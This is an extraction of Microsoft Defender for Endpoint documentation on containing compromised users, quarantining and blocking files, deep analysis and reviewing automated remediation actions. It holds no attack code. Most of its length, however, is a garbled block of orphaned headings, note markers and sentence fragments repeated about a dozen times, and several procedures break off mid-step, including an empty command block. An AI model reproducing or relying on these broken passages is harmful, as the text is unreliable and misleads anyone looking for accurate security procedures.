Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.
７ Note
Blocking incoming communication with a "contained" user is supported on

onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Servers
2012R2 and 2016 with the modern agent.
How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised a "Contain User"
policy is automatically set.
View the contain user actions

After a user is contained, you can view the action in this History view of the Action
Center. Here, you can see when the action occurred, and which users in your
organization were contained:
Furthermore, after an identity is considered "contained", that user will be blocked by

Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted access and potential attack techniques:

Undo contain user actions

You can release the blocks and containment on a user at any time:
1. Select the Contain User action in the Action Center. In the side pane select Undo
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo
This action will restore this user's connection to the network.
Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE Technique associated it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within the Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just regarding a potentially compromised device,
but also to better understand complex threats, targeted attack notifications that you
get, or if you need more information about the alerts, or a threat intelligence context
that you see on your portal dashboard.
See Consult a Microsoft Threat Expert for details.
Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:
Investigation package collection

Antivirus scan
App restriction
Device isolation
All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.
See also
Manual response actions in Microsoft Defender for Endpoint Plan 1
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 12/15/2023
Applies to:

） Important


center.
Manage tags
Run antivirus scan
Isolate device
Contain device
Action center
） Important
Run antivirus scan

Isolate device
queue.
） Important
Manage tags

investigation.

investigations.

response.

attacker.
of the device page.
Alternate steps:
device page.


package.
ﾉ Expand table
Folder Description


remote connections.
internal attack.

Folder Description

Security Log

prefetch files.

run automatically.

viewer.
movement.
SMBOutboundSession.
Folder Description



members.

installed:
Win10 1709 (RS3) Build 16299.1717:

KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

Folder Description

ﾉ Expand table
Object macOS Linux

volumes volumes

ARP table ARP table
VPN settings

information

Firewall status
information
Object macOS Linux

(SIP) status


devices
device.
） Important

７ Note

running.
） Important
７ Note

７ Note
R2.

） Important
live response
traffic.
monitor the device.
７ Note

７ Note

unresponsive.
７ Note




７ Note

７ Note





the action bar:
７ Note
） Important


７ Note











Antivirus scan
App restriction
Device isolation
See also
Report inaccuracy
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important

Quickly respond to detected attacks by stopping and quarantining files or blocking a

file. After taking action on files, you can check on activity details in the Action center.
Response actions are available on a file's detailed profile page. Once on this page, you
can switch between the new and old page layouts by toggling new File page. The rest of
this article describes the newer page layout.
Response actions run along the top of the file page, and include:
Stop and quarantine file

Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
You can also submit files for deep analysis, to run the file in a secure cloud sandbox.
When the analysis is complete, you'll get a detailed report that provides information
about the behavior of the file. You can submit files for deep analysis and read past
reports by selecting the Deep analysis action.
Some actions require certain permissions. The following table describes what action
certain permissions can take on portable executable (PE) and non-PE files:
ﾉ Expand table
Permission PE files Non-PE files
View data X X
Alerts investigation ☑ X
Live response basic X X
Live response advanced ☑ ☑
For more information on roles, see Create and manage roles for role-based access
control.
Stop and quarantine files in your network

You can contain an attack in your organization by stopping the malicious process and
quarantining the file where it was observed.
） Important
You can only take this action if:
The device you're taking the action on is running Windows 10, version 1703 or
later, Windows 11, and Windows Server 2012 R2+
The file does not belong to trusted third-party publishers or is not signed by
Microsoft
Microsoft Defender Antivirus must at least be running on Passive mode. For
more information, see Microsoft Defender Antivirus compatibility.
The Stop and Quarantine File action includes stopping running processes, quarantining
the files, and deleting persistent data such as registry keys.
This action takes effect on devices with Windows 10, version 1703 or later, and Windows
11 and Server 2012 R2+, where the file was observed in the last 30 days.
７ Note
You'll be able to restore the file from quarantine at any time.

Stop and quarantine files
1. Select the file you want to stop and quarantine. You can select a file from any of
the following views or use the Search box:
Alerts - select the corresponding links from the Description or Details in the
Alert Story timeline
Search box - select File from the drop-down menu and enter the file name
７ Note
The stop and quarantine file action is limited to a maximum of 1000 devices.
To stop a file on a larger number of devices, see Add indicator to block or
allow file.
2. Go to the top bar and select Stop and Quarantine File.
3. Specify a reason, then select Confirm.


The Action center shows the submission information:
Submission time - Shows when the action was submitted.

Success - Shows the number of devices where the file has been stopped and
quarantined.
Failed - Shows the number of devices where the action failed and details
about the failure.
Pending - Shows the number of devices where the file is yet to be stopped
and quarantined from. This can take time for cases when the device is offline
or not connected to the network.
4. Select any of the status indicators to view more information about the action. For
example, select Failed to see where the action failed.
When the file is being removed from a device, the following notification is shown:
In the device timeline, a new event is added for each device where a file was stopped
and quarantined.
A warning is shown before the action is implemented for files widely used throughout
an organization. It's to validate that the operation is intended.

quarantined.
1. Open an elevated command-line prompt on the device:
2. Enter the following command, and press Enter:
dos

７ Note
In some scenarios, the ThreatName may appear as:

EUS:Win32/CustomEnterpriseBlock!cl.
Defender for Endpoint will restore all custom blocked files that were
quarantined on this device in the last 30 days.
） Important
A file that was quarantined as a potential network threat might not be recoverable.
If a user attempts to restore the file after quarantine, that file might not be
accessible. This can be due to the system no longer having network credentials to
access the file. Typically, this is a result of a temporary log on to a system or shared
folder and the access tokens expired.
Download or collect file

Selecting Download file from the response actions allows you to download a local,
password-protected .zip archive containing your file. A flyout will appear where you can
record a reason for downloading the file, and set a password.
By default, you should be able to download files that are in quarantine.
The Download file button can have the following states:
Active - You'll be able to collect the file.
Disabled - If the button is grayed out or disabled during an active collection

attempt, you may not have appropriate RBAC permissions to collect files.
The following permissions are required:
For Microsoft Defender XDR Unified role-based access control (RBAC):

Add file collection permission in Microsoft Defender XDR Unified (RBAC)
For Microsoft Defender for Endpoint role-based access control (RBAC):
For Portable Executable file (.exe, .sys, .dll, and others)

Global admin or Advanced live response or Alerts
Non-Portable Executable file (.txt, .docx, and others)

Global admin or Advanced live response
Tenants with role-based access (RBAC) permissions enabled

Files that have been quarantined by Microsoft Defender Antivirus or your security team
will be saved in a compliant way according to your sample submission configurations.
Your security team can download the files directly from the file's detail page via the
"Download file" button. This feature is turned 'On' by default.
The location depends on your organization's geo settings (either EU, UK, or US). A
quarantined file will only be collected once per organization. Learn more about
Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP .
Having this setting turned on can help security teams examine potentially bad files and
investigate incidents quickly and in a less risky way. However, if you need to turn off this
setting, go to Settings > Endpoints > Advanced features > Download quarantined
files to adjust the setting. Learn more about advanced features
Backing up quarantined files
Users may be prompted to provide explicit consent before backing up the quarantined
file, depending on your sample submission configuration.
This feature won't work if sample submission is turned off. If automatic sample
submission is set to request permission from the user, only samples that the user agrees
to send will be collected.
） Important
Download quarantined file requirements:
Your organization uses Microsoft Defender Antivirus in active mode

Antivirus engine version is 1.1.17300.4 or later. See Monthly platform and
engine versions
Cloud–based protection is enabled. See Turn on cloud-delivered protection
Sample submission is turned on
Devices have Windows 10 version 1703 or later, or Windows server 2016 or
2019, or Windows Server 2022, or Windows 11
Collect files
If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it.
Instead, you'll see a Collect file button in the same location.
The Collect file button can have the following states:



If a file hasn't been seen in the organization in the past 30 days, Collect file will be
disabled.
） Important
Add indicator to block or allow a file
） Important
This feature is available if your organization uses Microsoft Defender Antivirus

and Cloud-delivered protection is enabled. For more information, see Manage
cloud-delivered protection.
This feature is designed to prevent suspected malware (or potentially

malicious files) from being downloaded from the web. It currently supports
portable executable (PE) files, including .exe and .dll files. The coverage will be
extended over time.
This response action is available for devices on Windows 10, version 1703 or
later, and Windows 11.
The allow or block function cannot be done on files if the file's classification
exists on the device's cache prior to the allow or block action.
７ Note
The PE file needs to be in the device timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken
and the actual file being blocked.
Enable the block file feature

To start blocking files, you first need to turn the Block or allow feature on in Settings.
Allow or block file

When you add an indicator hash for a file, you can choose to raise an alert and block the
file whenever a device in your organization attempts to run it.
See manage indicators for more details on blocking and raising alerts on files.
To stop blocking a file, remove the indicator. You can do so via the Edit Indicator action
on the file's profile page. This action will be visible in the same position as the Add
Indicator action, before you added the indicator.
You can also edit indicators from the Settings page, under Rules > Indicators. Indicators
are listed in this area by their file's hash.

You can view the following details:

Antivirus scan
App restriction
Device isolation
All other related details are also shown, such as submission date/time, submitting user,
and if the action succeeded or failed.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one
or more observed files that are often new or unknown. Selecting a file takes you to the
file view where you can see the file's metadata. To enrich the data related to the file, you
can submit the file for deep analysis.
The Deep analysis feature executes a file in a secure, fully instrumented cloud
environment. Deep analysis results show the file's activities, observed behaviors, and
associated artifacts, such as dropped files, registry modifications, and communication
with IPs. Deep analysis currently supports extensive analysis of portable executable (PE)
files (including .exe and .dll files).
Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep
Analysis tab will update to display a summary and the date and time of the latest
available results.
The deep analysis summary includes a list of observed behaviors, some of which can
indicate malicious activity, and observables, including contacted IPs and files created on
the disk. If nothing was found, these sections will display a brief message.
Results of deep analysis are matched against threat intelligence and any matches will
generate appropriate alerts.
Use the deep analysis feature to investigate the details of any file, usually during an
investigation of an alert or for any other reason where you suspect malicious behavior.
This feature is available at the top of the file's page. Select the three dots to access the
Deep analysis action.
Learn about deep analysis in the following video:

https://www.microsoft.com/en-us/videoplayer/embed/RE4aAYy?
Submit for deep analysis is enabled when the file is available in the Defender for
Endpoint backend sample collection, or if it was observed on a Windows 10 device that
supports submitting to deep analysis.
７ Note
Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be
automatically collected.
You can also submit a sample through the Microsoft Defender portal if the file wasn't
observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and
wait for Submit for deep analysis button to become available.
７ Note
Due to backend processing flows in the Microsoft Defender portal, there could be
up to 10 minutes of latency between file submission and availability of the deep
analysis feature in Defender for Endpoint.
Submit files for deep analysis

1. Select the file that you want to submit for deep analysis. You can select or search a
file from any of the following views:
Alerts - select the file links from the Description or Details in the Alert Story
timeline
Devices list - select the file links from the Description or Details in the Device
in organization section
2. In the Deep analysis tab of the file view, select Submit.
７ Note
Only PE files are supported, including .exe and .dll files.
A progress bar is displayed and provides information on the different stages of the
analysis. You can then view the report when the analysis is done.
７ Note
Depending on device availability, sample collection time can vary. There is a 3-hour
timeout for sample collection. The collection will fail and the operation will abort if
there is no online Windows 10 device (or Windows 11 or Windows Server 2012
R2+) reporting at that time. You can re-submit files for deep analysis to get fresh
data on the file.
View deep analysis reports

View the provided deep analysis report to see more in-depth insights on the file you
submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential
attack.
1. Select the file you submitted for deep analysis.
2. Select the Deep analysis tab. If there are any previous reports, the report summary
will appear in this tab.
Troubleshoot deep analysis

If you come across a problem when trying to submit a file, try each of the following
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll
extensions (executable programs or applications).
2. Ensure the service has access to the file, that it still exists, and hasn't been
corrupted or modified.
3. Wait a short while and try to submit the file again. The queue may be full, or there
was a temporary connection or communication error.
4. If the sample collection policy isn't configured, then the default behavior is to allow
sample collection. If it's configured, then verify the policy setting allows sample
collection before submitting the file again. When sample collection is configured,
then check the following registry value:
text
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat

Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value :
Value = 0 - block sample collection
Value = 1 - allow sample collection
5. Change the organizational unit through the Group Policy. For more information,
see Configure with Group Policy.
6. If these steps don't resolve the issue, contact support.
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Article • 08/07/2023
Applies to:

） Important



Manage indicator
Download file
Collect file
Manual actions
Go hunt
Deep analysis
ﾉ Expand table
View data X X
control.

） Important
Microsoft
７ Note

７ Note
allow file.



quarantined.
about the failure.
and quarantined.

quarantined.
dos

７ Note

） Important






） Important

engine versions
Collect files



disabled.
） Important
） Important


extended over time.
７ Note

Allow or block file



Antivirus scan
App restriction
Device isolation

Deep analysis
available results.

７ Note
７ Note

timeline
７ Note
７ Note
data on the file.

Behaviors
Observables
attack.

text

Protection
Type: DWORD
Hexadecimal value :
Related topics
Investigate files
 Tip
Feedback

Review remediation actions following an
automated investigation
Article • 07/13/2023
Applies to:

Remediation actions
When an automated investigation runs, a verdict is generated for each piece of evidence
investigated. Verdicts can be Malicious, Suspicious, or No threats found.
Depending on
the type of threat,

the resulting verdict, and
how your organization's device groups are configured,
remediation actions can occur automatically or only upon approval by your

organization's security operations team.
７ Note
Here are a few examples:
Example 1: Fabrikam's device groups are set to Full - remediate threats

automatically (the recommended setting). In this case, remediation actions are
taken automatically for artifacts that are considered to be malicious following an
automated investigation (see Review completed actions).
Example 2: Contoso's devices are included in a device group that is set for Semi -
require approval for any remediation. In this case, Contoso's security operations
team must review and approve all remediation actions following an automated
investigation (see Review pending actions).
Example 3: Tailspin Toys has their device groups set to No automated response
(not recommended). In this case, automated investigations do not occur. No
remediation actions are taken or pending, and no actions are logged in the Action
center for their devices (see Manage device groups).
Whether taken automatically or upon approval, an automated investigation and

remediation can result in one or more of the remediation actions:
Quarantine a file
Kill a process
Stop a service
Disable a driver
Review pending actions

2. In the navigation pane, choose Action center.
3. Review the items on the Pending tab.
4. Select an action to open its flyout pane.
5. In the flyout pane, review the information, and then take one of the following
steps:
Select Open investigation page to view more details about the investigation.
Select Approve to initiate a pending action.
Select Reject to prevent a pending action from being taken.
Select Go hunt to go into Advanced hunting.
Approve or reject remediation actions

For incidents with a remediation status of Pending approval, you can also approve or
reject a remediation action from within the incident.
1. In the navigation pane, go to Incidents & alerts > Incidents.

2. Filter on Pending action for the Automated investigation state (optional).
3. Select an incident name to open its summary page.
4. Select the Evidence and Response tab.
5. Select an item in the list to open its flyout pane.
6. Review the information, and then take one of the following steps:
Select the Approve pending action option to initiate a pending action.
Select the Reject pending action option to prevent a pending action from
being taken.
Review completed actions

3. Review the items on the History tab.
4. Select an item to view more details about that remediation action.
Undo completed actions

If you've determined that a device or a file is not a threat, you can undo remediation
actions that were taken, whether those actions were taken automatically or manually. In
the Action center, on the History tab, you can undo any of the following actions:
ﾉ Expand table
Action source Supported Actions
Automated investigation Disable a driver

Manual response actions (see the note below) Isolate device
Microsoft Defender Antivirus Quarantine a file
Restrict code execution
Stop a service
７ Note
Defender for Endpoint Plan 1 and Microsoft Defender for Business include only
the following manual response actions:
Run antivirus scan

Isolate device
Add an indicator to block or allow a file
To undo multiple actions at one time

1. Go to the Action center (https://security.microsoft.com/action-center ) and sign
in.
2. On the History tab, select the actions that you want to undo. Make sure to select
items that have the same Action type. A flyout pane opens.
3. In the flyout pane, select Undo.
To remove a file from quarantine across multiple devices

